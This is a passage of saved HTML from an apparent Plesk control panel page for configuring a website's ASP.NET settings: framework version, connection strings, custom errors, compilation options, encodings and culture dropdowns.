onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fshared-ssl%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>ASP.NET Configuration for Website</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/aspdotnet_dom/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function update_oC(f)
{
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

function restore_default_oC(f)
{
   if (!confirm("Restore default ASP.NET settings?"))
       return false;
   f.cmd.value = "restore_default";
   lsubmit(f);
   return false;
}
function custom_errors_status_check(val) {
   if (!chk_uint(val))
       return "Number is invalid.";
   return true;
}
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/aspdotnet/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       
<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-change-version" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Change ASP.NET version used by this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;" style=""><BUTTON name="bname_change-version" id="buttonid-change-version" type="button" onClick="Event.stop(event);f = document.forms[0];
           f.cmd.value = &#039;&#039;;
           f.action = &#039;/plesk/client@2/domain@1/hosting/aspdotnet/change-version/&#039;;
           lsubmit(f);
           return false;;return false;">Change Version</BUTTON><SPAN id="spanid-change-version">Change Version</SPAN></DIV>
           <DIV class="commonButton" id="bid-restore-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore server default ASP.NET settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_restore_default" id="buttonid-restore-default" type="button" onClick="Event.stop(event);restore_default_oC(document.forms[0]); return false;;return false;">Set to Default</BUTTON><SPAN id="spanid-restore-default">Set to Default</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>


<div class="formArea">


<fieldset>

<legend>Framework Version</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-version">Version</label></td>
           <td>


   2.0.50727.4927<input type="hidden" name="version" value="2.0.50727.4927">








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Connection String Manager</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-conn_strings">Connection strings</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="conn_strings"></div><script>
var conn_strings_columns = new Array();
conn_strings_columns[0] = new Array();
conn_strings_columns[0]['size'] = 30;
conn_strings_columns[0]['name'] = 'conn_string_name';
conn_strings_columns[0]['text'] = 'Name';
conn_strings_columns[0]['type'] = 'text';
conn_strings_columns[0]['editable'] = false;
conn_strings_columns[0]['required'] = true;
conn_strings_columns[0]['primary'] = true;
conn_strings_columns[0]['check'] = null;
conn_strings_columns[1] = new Array();
conn_strings_columns[1]['size'] = 70;
conn_strings_columns[1]['name'] = 'conn_string_value';
conn_strings_columns[1]['text'] = 'Connection Parameters';
conn_strings_columns[1]['type'] = 'text';
conn_strings_columns[1]['editable'] = true;
conn_strings_columns[1]['required'] = true;
conn_strings_columns[1]['primary'] = false;
conn_strings_columns[1]['check'] = null;
var conn_strings_data = new Array();
var conn_strings_can_delete = new Array();
var conn_strings_additional_data = new Array();
conn_strings_data[0] = new Array('LocalSqlServer', 'data source=.\\SQLEXPRESS;Integrated Security=SSPI;AttachDBFilename=|DataDirectory|aspnetdb.mdf;User Instance=true');
conn_strings_can_delete[0] = true;
conn_strings_additional_data[0] = '';
var conn_stringsEditListObj = new psaEditList('conn_strings', true);
conn_stringsEditListObj.setColumns(conn_strings_columns);
conn_stringsEditListObj.setAllData(conn_strings_data, conn_strings_can_delete);
conn_stringsEditListObj.setAllAdditionalData(conn_strings_additional_data);
conn_stringsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
conn_stringsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
conn_stringsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
conn_stringsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
conn_stringsEditListObj.render('conn_strings');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Custom Error Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-custom_err_mode">Custom error mode</label></td>
           <td>



   <select name="custom_err_mode" id="fid-custom_err_mode" >    <option value='On'>On</option>
   <option value='Off'>Off</option>
   <option value='RemoteOnly' SELECTED>RemoteOnly</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-custom_errors">Custom errors</label></td>
           <td>




   <script language="javascript" type="text/javascript" src="/javascript/editlist.js"></script><div id="custom_errors"></div><script>
var custom_errors_columns = new Array();
custom_errors_columns[0] = new Array();
custom_errors_columns[0]['size'] = 30;
custom_errors_columns[0]['name'] = 'custom_error_status';
custom_errors_columns[0]['text'] = 'Status Code';
custom_errors_columns[0]['type'] = 'text';
custom_errors_columns[0]['editable'] = false;
custom_errors_columns[0]['required'] = true;
custom_errors_columns[0]['primary'] = true;
custom_errors_columns[0]['check'] = custom_errors_status_check;
custom_errors_columns[1] = new Array();
custom_errors_columns[1]['size'] = 70;
custom_errors_columns[1]['name'] = 'custom_error_redirect';
custom_errors_columns[1]['text'] = 'Redirect URL';
custom_errors_columns[1]['type'] = 'text';
custom_errors_columns[1]['editable'] = true;
custom_errors_columns[1]['required'] = true;
custom_errors_columns[1]['primary'] = false;
custom_errors_columns[1]['check'] = null;
var custom_errors_data = new Array();
var custom_errors_can_delete = new Array();
var custom_errors_additional_data = new Array();
var custom_errorsEditListObj = new psaEditList('custom_errors', true);
custom_errorsEditListObj.setColumns(custom_errors_columns);
custom_errorsEditListObj.setAllData(custom_errors_data, custom_errors_can_delete);
custom_errorsEditListObj.setAllAdditionalData(custom_errors_additional_data);
custom_errorsEditListObj.setAddIcon('/skins/default/plesk/icons/list_item_add.gif', 16, 16);
custom_errorsEditListObj.setAddDisabledIcon('/skins/default/plesk/icons/list_item_add-disabled.gif', 16, 16);
custom_errorsEditListObj.setDelIcon('/skins/default/plesk/icons/list_item_remove.gif', 16, 16);
custom_errorsEditListObj.setDelDisabledIcon('/skins/default/plesk/icons/list_item_remove-disabled.gif', 16, 16);
custom_errorsEditListObj.render('custom_errors');
</script>






           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Compilation and Debugging</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-def_language">Default web page language</label></td>
           <td>



   <select name="def_language" id="fid-def_language" >    <option value='c#'>c#</option>
   <option value='vb' SELECTED>vb</option>
   <option value='js'>js</option>
   <option value='vj#'>vj#</option>
   <option value='c++'>c++</option>
   <option value='c++7'>c++7</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-debug_mode">Switch on debugging</label></td>
           <td>







   <input type="checkbox" class="checkbox" name="debug_mode" id="fid-debug_mode" value="true" >



           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Globalization Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-req_enc">Request encoding</label></td>
           <td>






   <input type="text" name="req_enc" id="fid-req_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-res_enc">Response encoding</label></td>
           <td>






   <input type="text" name="res_enc" id="fid-res_enc" value="utf-8"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-file_enc">File encoding</label></td>
           <td>






   <input type="text" name="file_enc" id="fid-file_enc" value="Windows-1252"} size="15">




           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-culture">Culture</label></td>
           <td>



   <select name="culture" id="fid-culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokmål (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
   <option value='oc-FR'>Occitan (France)</option>
   <option value='or-IN'>Oriya (India)</option>
   <option value='ps-AF'>Pashto (Afghanistan)</option>
   <option value='fa-IR'>Persian (Iran)</option>
   <option value='pl-PL'>Polish (Poland)</option>
   <option value='pt-BR'>Portuguese (Brazil)</option>
   <option value='pt-PT'>Portuguese (Portugal)</option>
   <option value='pa-IN'>Punjabi (India)</option>
   <option value='quz-BO'>Quechua (Bolivia)</option>
   <option value='quz-EC'>Quechua (Ecuador)</option>
   <option value='quz-PE'>Quechua (Peru)</option>
   <option value='ro-RO'>Romanian (Romania)</option>
   <option value='rm-CH'>Romansh (Switzerland)</option>
   <option value='ru-RU'>Russian (Russia)</option>
   <option value='smn-FI'>Sami (Inari) (Finland)</option>
   <option value='smj-NO'>Sami (Lule) (Norway)</option>
   <option value='smj-SE'>Sami (Lule) (Sweden)</option>
   <option value='se-FI'>Sami (Northern) (Finland)</option>
   <option value='se-NO'>Sami (Northern) (Norway)</option>
   <option value='se-SE'>Sami (Northern) (Sweden)</option>
   <option value='sms-FI'>Sami (Skolt) (Finland)</option>
   <option value='sma-NO'>Sami (Southern) (Norway)</option>
   <option value='sma-SE'>Sami (Southern) (Sweden)</option>
   <option value='sa-IN'>Sanskrit (India)</option>
   <option value='gd-GB'>Scottish Gaelic (United Kingdom)</option>
   <option value='sr-Cyrl-BA'>Serbian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='sr-Cyrl-ME'>Serbian (Cyrillic) (Montenegro)</option>
   <option value='sr-Cyrl-RS'>Serbian (Cyrillic) (Serbia)</option>
   <option value='sr-Cyrl-CS'>Serbian (Cyrillic, Serbia and Montenegro (Former))</option>
   <option value='sr-Latn-BA'>Serbian (Latin) (Bosnia and Herzegovina)</option>
   <option value='sr-Latn-ME'>Serbian (Latin) (Montenegro)</option>
   <option value='sr-Latn-RS'>Serbian (Latin) (Serbia)</option>
   <option value='sr-Latn-CS'>Serbian (Latin, Serbia and Montenegro (Former))</option>
   <option value='nso-ZA'>Sesotho sa Leboa (South Africa)</option>
   <option value='tn-ZA'>Setswana (South Africa)</option>
   <option value='si-LK'>Sinhala (Sri Lanka)</option>
   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-ui_culture">UI Culture</label></td>
           <td>



   <select name="ui_culture" id="fid-ui_culture" >    <option value='af-ZA'>Afrikaans (South Africa)</option>
   <option value='sq-AL'>Albanian (Albania)</option>
   <option value='gsw-FR'>Alsatian (France)</option>
   <option value='am-ET'>Amharic (Ethiopia)</option>
   <option value='ar-DZ'>Arabic (Algeria)</option>
   <option value='ar-BH'>Arabic (Bahrain)</option>
   <option value='ar-EG'>Arabic (Egypt)</option>
   <option value='ar-IQ'>Arabic (Iraq)</option>
   <option value='ar-JO'>Arabic (Jordan)</option>
   <option value='ar-KW'>Arabic (Kuwait)</option>
   <option value='ar-LB'>Arabic (Lebanon)</option>
   <option value='ar-LY'>Arabic (Libya)</option>
   <option value='ar-MA'>Arabic (Morocco)</option>
   <option value='ar-OM'>Arabic (Oman)</option>
   <option value='ar-QA'>Arabic (Qatar)</option>
   <option value='ar-SA'>Arabic (Saudi Arabia)</option>
   <option value='ar-SY'>Arabic (Syria)</option>
   <option value='ar-TN'>Arabic (Tunisia)</option>
   <option value='ar-AE'>Arabic (U.A.E.)</option>
   <option value='ar-YE'>Arabic (Yemen)</option>
   <option value='hy-AM'>Armenian (Armenia)</option>
   <option value='as-IN'>Assamese (India)</option>
   <option value='az-Cyrl-AZ'>Azeri (Cyrillic, Azerbaijan)</option>
   <option value='az-Latn-AZ'>Azeri (Latin, Azerbaijan)</option>
   <option value='ba-RU'>Bashkir (Russia)</option>
   <option value='eu-ES'>Basque (Basque)</option>
   <option value='be-BY'>Belarusian (Belarus)</option>
   <option value='bn-BD'>Bengali (Bangladesh)</option>
   <option value='bn-IN'>Bengali (India)</option>
   <option value='bs-Cyrl-BA'>Bosnian (Cyrillic) (Bosnia and Herzegovina)</option>
   <option value='bs-Latn-BA'>Bosnian (Latin) (Bosnia and Herzegovina)</option>
   <option value='br-FR'>Breton (France)</option>
   <option value='bg-BG'>Bulgarian (Bulgaria)</option>
   <option value='ca-ES'>Catalan (Catalan)</option>
   <option value='zh-HK'>Chinese (Hong Kong S.A.R.)</option>
   <option value='zh-MO'>Chinese (Macao S.A.R.)</option>
   <option value='zh-CN'>Chinese (People&#039;s Republic of China)</option>
   <option value='zh-SG'>Chinese (Singapore)</option>
   <option value='zh-TW'>Chinese (Taiwan)</option>
   <option value='co-FR'>Corsican (France)</option>
   <option value='hr-HR'>Croatian (Croatia)</option>
   <option value='hr-BA'>Croatian (Latin) (Bosnia and Herzegovina)</option>
   <option value='cs-CZ'>Czech (Czech Republic)</option>
   <option value='da-DK'>Danish (Denmark)</option>
   <option value='prs-AF'>Dari (Afghanistan)</option>
   <option value='dv-MV'>Divehi (Maldives)</option>
   <option value='nl-BE'>Dutch (Belgium)</option>
   <option value='nl-NL'>Dutch (Netherlands)</option>
   <option value='en-AU'>English (Australia)</option>
   <option value='en-BZ'>English (Belize)</option>
   <option value='en-CA'>English (Canada)</option>
   <option value='en-029'>English (Caribbean)</option>
   <option value='en-IN'>English (India)</option>
   <option value='en-IE'>English (Ireland)</option>
   <option value='en-JM'>English (Jamaica)</option>
   <option value='en-MY'>English (Malaysia)</option>
   <option value='en-NZ'>English (New Zealand)</option>
   <option value='en-PH'>English (Republic of the Philippines)</option>
   <option value='en-SG'>English (Singapore)</option>
   <option value='en-ZA'>English (South Africa)</option>
   <option value='en-TT'>English (Trinidad and Tobago)</option>
   <option value='en-GB'>English (United Kingdom)</option>
   <option value='en-US'>English (United States)</option>
   <option value='en-ZW'>English (Zimbabwe)</option>
   <option value='et-EE'>Estonian (Estonia)</option>
   <option value='fo-FO'>Faroese (Faroe Islands)</option>
   <option value='fil-PH'>Filipino (Philippines)</option>
   <option value='fi-FI'>Finnish (Finland)</option>
   <option value='fr-BE'>French (Belgium)</option>
   <option value='fr-CA'>French (Canada)</option>
   <option value='fr-FR'>French (France)</option>
   <option value='fr-LU'>French (Luxembourg)</option>
   <option value='fr-MC'>French (Principality of Monaco)</option>
   <option value='fr-CH'>French (Switzerland)</option>
   <option value='fy-NL'>Frisian (Netherlands)</option>
   <option value='gl-ES'>Galician (Galician)</option>
   <option value='ka-GE'>Georgian (Georgia)</option>
   <option value='de-AT'>German (Austria)</option>
   <option value='de-DE'>German (Germany)</option>
   <option value='de-LI'>German (Liechtenstein)</option>
   <option value='de-LU'>German (Luxembourg)</option>
   <option value='de-CH'>German (Switzerland)</option>
   <option value='el-GR'>Greek (Greece)</option>
   <option value='kl-GL'>Greenlandic (Greenland)</option>
   <option value='gu-IN'>Gujarati (India)</option>
   <option value='ha-Latn-NG'>Hausa (Latin) (Nigeria)</option>
   <option value='he-IL'>Hebrew (Israel)</option>
   <option value='hi-IN'>Hindi (India)</option>
   <option value='hu-HU'>Hungarian (Hungary)</option>
   <option value='is-IS'>Icelandic (Iceland)</option>
   <option value='ig-NG'>Igbo (Nigeria)</option>
   <option value='id-ID'>Indonesian (Indonesia)</option>
   <option value='iu-Latn-CA'>Inuktitut (Latin) (Canada)</option>
   <option value='iu-Cans-CA'>Inuktitut (Syllabics) (Canada)</option>
   <option value='' SELECTED>Invariant</option>
   <option value='ga-IE'>Irish (Ireland)</option>
   <option value='it-IT'>Italian (Italy)</option>
   <option value='it-CH'>Italian (Switzerland)</option>
   <option value='ja-JP'>Japanese (Japan)</option>
   <option value='qut-GT'>K&#039;iche (Guatemala)</option>
   <option value='kn-IN'>Kannada (India)</option>
   <option value='kk-KZ'>Kazakh (Kazakhstan)</option>
   <option value='km-KH'>Khmer (Cambodia)</option>
   <option value='rw-RW'>Kinyarwanda (Rwanda)</option>
   <option value='sw-KE'>Kiswahili (Kenya)</option>
   <option value='kok-IN'>Konkani (India)</option>
   <option value='ko-KR'>Korean (Korea)</option>
   <option value='ky-KG'>Kyrgyz (Kyrgyzstan)</option>
   <option value='lo-LA'>Lao (Lao P.D.R.)</option>
   <option value='lv-LV'>Latvian (Latvia)</option>
   <option value='lt-LT'>Lithuanian (Lithuania)</option>
   <option value='dsb-DE'>Lower Sorbian (Germany)</option>
   <option value='lb-LU'>Luxembourgish (Luxembourg)</option>
   <option value='mk-MK'>Macedonian (Former Yugoslav Republic of Macedonia)</option>
   <option value='ms-BN'>Malay (Brunei Darussalam)</option>
   <option value='ms-MY'>Malay (Malaysia)</option>
   <option value='ml-IN'>Malayalam (India)</option>
   <option value='mt-MT'>Maltese (Malta)</option>
   <option value='mi-NZ'>Maori (New Zealand)</option>
   <option value='arn-CL'>Mapudungun (Chile)</option>
   <option value='mr-IN'>Marathi (India)</option>
   <option value='moh-CA'>Mohawk (Canada)</option>
   <option value='mn-MN'>Mongolian (Cyrillic, Mongolia)</option>
   <option value='mn-Mong-CN'>Mongolian (Traditional Mongolian) (People&#039;s Republic of China)</option>
   <option value='ne-NP'>Nepali (Nepal)</option>
   <option value='nb-NO'>Norwegian, Bokmål (Norway)</option>
   <option value='nn-NO'>Norwegian, Nynorsk (Norway)</option>
